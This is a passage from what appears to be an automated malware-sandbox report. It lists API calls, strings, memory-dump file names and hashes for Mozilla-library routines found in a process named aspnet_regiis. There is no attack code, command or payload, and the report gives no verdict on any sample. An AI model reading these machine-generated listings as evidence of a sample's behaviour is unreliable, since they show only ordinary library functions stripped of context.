                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7A5E9D
                                                                                                                                                                      • Part of subcall function 6C7B5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5B85
                                                                                                                                                                      • Part of subcall function 6C7B5B50: EnterCriticalSection.KERNEL32(6C81F688,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5B90
                                                                                                                                                                      • Part of subcall function 6C7B5B50: LeaveCriticalSection.KERNEL32(6C81F688,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5BD8
                                                                                                                                                                      • Part of subcall function 6C7B5B50: GetTickCount64.KERNEL32 ref: 6C7B5BE4
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7A5EAB
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7A5EB8
                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7A5ECF
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C7A6017
                                                                                                                                                                      • Part of subcall function 6C794310: moz_xmalloc.MOZGLUE(00000010,?,6C7942D2), ref: 6C79436A
                                                                                                                                                                      • Part of subcall function 6C794310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C7942D2), ref: 6C794387
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000004), ref: 6C7A5F47
                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C7A5F53
                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C7A5F5C
                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C7A5F66
                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C7A5F7E
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000024), ref: 6C7A5F27
                                                                                                                                                                      • Part of subcall function 6C7ACA10: mozalloc_abort.MOZGLUE(?), ref: 6C7ACAA2
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7A55E1), ref: 6C7A5E8C
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7A55E1), ref: 6C7A605D
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7A55E1), ref: 6C7A60CC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                                                                    • String ID: GeckoMain
                                                                                                                                                                    • API String ID: 3711609982-966795396
                                                                                                                                                                    • Opcode ID: ac96d18bd0fd188dbde771bee873cabf641b37dec44ffae55d47fe3052004c45
                                                                                                                                                                    • Instruction ID: a2384093c9c988eed4569191dffbb27144f868f3d0cebe2303411463442f0a47
                                                                                                                                                                    • Opcode Fuzzy Hash: ac96d18bd0fd188dbde771bee873cabf641b37dec44ffae55d47fe3052004c45
                                                                                                                                                                    • Instruction Fuzzy Hash: 777101B06047419FD710DF69D584A6ABBF0FF59308F004A7DE48687B42D730E989CB92
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7931C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C793217
                                                                                                                                                                      • Part of subcall function 6C7931C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C793236
                                                                                                                                                                      • Part of subcall function 6C7931C0: FreeLibrary.KERNEL32 ref: 6C79324B
                                                                                                                                                                      • Part of subcall function 6C7931C0: __Init_thread_footer.LIBCMT ref: 6C793260
                                                                                                                                                                      • Part of subcall function 6C7931C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C79327F
                                                                                                                                                                      • Part of subcall function 6C7931C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C79328E
                                                                                                                                                                      • Part of subcall function 6C7931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7932AB
                                                                                                                                                                      • Part of subcall function 6C7931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7932D1
                                                                                                                                                                      • Part of subcall function 6C7931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C7932E5
                                                                                                                                                                      • Part of subcall function 6C7931C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C7932F7
                                                                                                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C7A9675
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A9697
                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C7A96E8
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C7A9707
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7A971F
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C7A9773
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C7A97B7
                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C7A97D0
                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C7A97EB
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C7A9824
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                    • API String ID: 3361784254-3880535382
                                                                                                                                                                    • Opcode ID: 97d23599226d09b42dc1717ea9c7e46d4c3a4a33debf6ea1abd1d38ef2d9ac0c
                                                                                                                                                                    • Instruction ID: b8c4a2cc9ce97396711eea9cb74b539df2146fbd9dd8df3cd4c9e28299921230
                                                                                                                                                                    • Opcode Fuzzy Hash: 97d23599226d09b42dc1717ea9c7e46d4c3a4a33debf6ea1abd1d38ef2d9ac0c
                                                                                                                                                                    • Instruction Fuzzy Hash: 4161B5717042429BDF20CFA4DA89A9A7BF1EB6B318F104A39F91583F50D7319855CBD1
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(6C81F618), ref: 6C7F6694
                                                                                                                                                                    • GetThreadId.KERNEL32(?), ref: 6C7F66B1
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7F66B9
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C7F66E1
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81F618), ref: 6C7F6734
                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 6C7F673A
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81F618), ref: 6C7F676C
                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C7F67FC
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C7F6868
                                                                                                                                                                    • RtlCaptureContext.NTDLL ref: 6C7F687F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                                                                    • String ID: WalkStack64
                                                                                                                                                                    • API String ID: 2357170935-3499369396
                                                                                                                                                                    • Opcode ID: 4bff853ba2be0100cfbb63af21d73c0c411b3c5a8330302ca0f38e9c3a4790b0
                                                                                                                                                                    • Instruction ID: d2f45311d7b94a2bcb0b834dbf0a8bdfac94883dc92cee8de6611c3532058e15
                                                                                                                                                                    • Opcode Fuzzy Hash: 4bff853ba2be0100cfbb63af21d73c0c411b3c5a8330302ca0f38e9c3a4790b0
                                                                                                                                                                    • Instruction Fuzzy Hash: 57516F71A09302AFD721CF25CA85A5ABBF4BF89718F00492DF5A997B40D770E905CB92
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DDE73
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DDF7D
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DDF8A
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DDFC9
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DDFF7
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DE000
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C7A4A68), ref: 6C7DDE7B
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: GetCurrentProcess.KERNEL32(?,6C7931A7), ref: 6C7CCBF1
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7931A7), ref: 6C7CCBFA
                                                                                                                                                                    • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C7A4A68), ref: 6C7DDEB8
                                                                                                                                                                    • free.MOZGLUE(00000000,?,6C7A4A68), ref: 6C7DDEFE
                                                                                                                                                                    • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C7DDF38
                                                                                                                                                                    Strings
                                                                                                                                                                    • <none>, xrefs: 6C7DDFD7
                                                                                                                                                                    • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C7DE00E
                                                                                                                                                                    • [I %d/%d] locked_profiler_stop, xrefs: 6C7DDE83
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                                                                                                    • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                                                                                    • API String ID: 1281939033-809102171
                                                                                                                                                                    • Opcode ID: dec5615ba76c91c5297e539752b91880da378fbaf7e15c0517b6289336077f0c
                                                                                                                                                                    • Instruction ID: 98351d9b94e4f61c2bc5ca17b11784a51abf74ca4d4e5e8c86966bf82cb765e9
                                                                                                                                                                    • Opcode Fuzzy Hash: dec5615ba76c91c5297e539752b91880da378fbaf7e15c0517b6289336077f0c
                                                                                                                                                                    • Instruction Fuzzy Hash: 924106717012129BEB309F65DA0D7AA77F5EBA530DF150439E92997F01CB30A805CBEA
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7ED85F
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7ED86C
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7ED918
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7ED93C
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7ED948
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7ED970
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7ED976
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7ED982
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7ED9CF
                                                                                                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C7EDA2E
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7EDA6F
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7EDA78
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C7EDA91
                                                                                                                                                                      • Part of subcall function 6C7B5C50: GetTickCount64.KERNEL32 ref: 6C7B5D40
                                                                                                                                                                      • Part of subcall function 6C7B5C50: EnterCriticalSection.KERNEL32(6C81F688), ref: 6C7B5D67
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7EDAB7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1195625958-0
                                                                                                                                                                    • Opcode ID: dc61e21695b1cf995bcf1c4af091b607629f218132188e6bfb0003dd3ea1451a
                                                                                                                                                                    • Instruction ID: 15e70a343995ee62624768a419ccb97c1ae7a475e033726eab4ac417fbb7bb85
                                                                                                                                                                    • Opcode Fuzzy Hash: dc61e21695b1cf995bcf1c4af091b607629f218132188e6bfb0003dd3ea1451a
                                                                                                                                                                    • Instruction Fuzzy Hash: F771AE756043059FCB10CF28C888BAABBF5FF89318F15857EE85A9B701DB30A945CB91
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7ED4F0
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7ED4FC
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7ED52A
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7ED530
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7ED53F
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7ED55F
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7ED585
                                                                                                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C7ED5D3
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7ED5F9
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7ED605
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7ED652
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7ED658
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7ED667
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7ED6A2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2206442479-0
                                                                                                                                                                    • Opcode ID: f200789d4f6e552fa571feda080e33b4ef926fd1e0bc811512a612117211af34
                                                                                                                                                                    • Instruction ID: feb9c13713543a68e640a8f28b90fb3482ec2eb7311862828c72b12d9a772009
                                                                                                                                                                    • Opcode Fuzzy Hash: f200789d4f6e552fa571feda080e33b4ef926fd1e0bc811512a612117211af34
                                                                                                                                                                    • Instruction Fuzzy Hash: 085160B1604706DFC714DF34C588AAABBF4FF89358F10862EE85A87B11DB30A945CB95
                                                                                                                                                                    APIs
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C7B56D1
                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7B56E9
                                                                                                                                                                    • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C7B56F1
                                                                                                                                                                    • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C7B5744
                                                                                                                                                                    • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C7B57BC
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6C7B58CB
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81F688), ref: 6C7B58F3
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C7B5945
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81F688), ref: 6C7B59B2
                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C81F638,?,?,?,?), ref: 6C7B59E9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                                                                    • String ID: MOZ_APP_RESTART
                                                                                                                                                                    • API String ID: 2752551254-2657566371
                                                                                                                                                                    • Opcode ID: fe1581bc2544104f1ced3d7969ec329467fda25f668d80da41e9f3ca6ae9f03b
                                                                                                                                                                    • Instruction ID: db4c2057f08c811ef6dc1e7589bac625f91fde9d4933c323bb62b001ad00c81a
                                                                                                                                                                    • Opcode Fuzzy Hash: fe1581bc2544104f1ced3d7969ec329467fda25f668d80da41e9f3ca6ae9f03b
                                                                                                                                                                    • Instruction Fuzzy Hash: CFC1A071A083419FD715CF28D54566ABBF1FFDA718F058A2DE4C8A7B21D730A885CB82
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DEC84
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C7DEC8C
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DECA1
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DECAE
                                                                                                                                                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C7DECC5
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DED0A
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C7DED19
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6C7DED28
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C7DED2F
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8), ref: 6C7DED59
                                                                                                                                                                    Strings
                                                                                                                                                                    • [I %d/%d] profiler_ensure_started, xrefs: 6C7DEC94
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                    • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                    • API String ID: 4057186437-125001283
                                                                                                                                                                    • Opcode ID: 31ac60bef4d2166a946fbff221923ef03627a1517d1236a7aa8fb315a1fb2200
                                                                                                                                                                    • Instruction ID: da48f8e58e8be1b5525afcc6f822121e9d9c46a83fc7a8bf193b556a1d703504
                                                                                                                                                                    • Opcode Fuzzy Hash: 31ac60bef4d2166a946fbff221923ef03627a1517d1236a7aa8fb315a1fb2200
                                                                                                                                                                    • Instruction Fuzzy Hash: 432107B160010A9FDB119F65D90EBAB77B9EB5626DF114230FC1897F41DB31A805CBE1
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6C7F6009
                                                                                                                                                                    • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C7F6024
                                                                                                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(Qyl,?), ref: 6C7F6046
                                                                                                                                                                    • OutputDebugStringA.KERNEL32(?,Qyl,?), ref: 6C7F6061
                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7F6069
                                                                                                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7F6073
                                                                                                                                                                    • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7F6082
                                                                                                                                                                    • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C81148E), ref: 6C7F6091
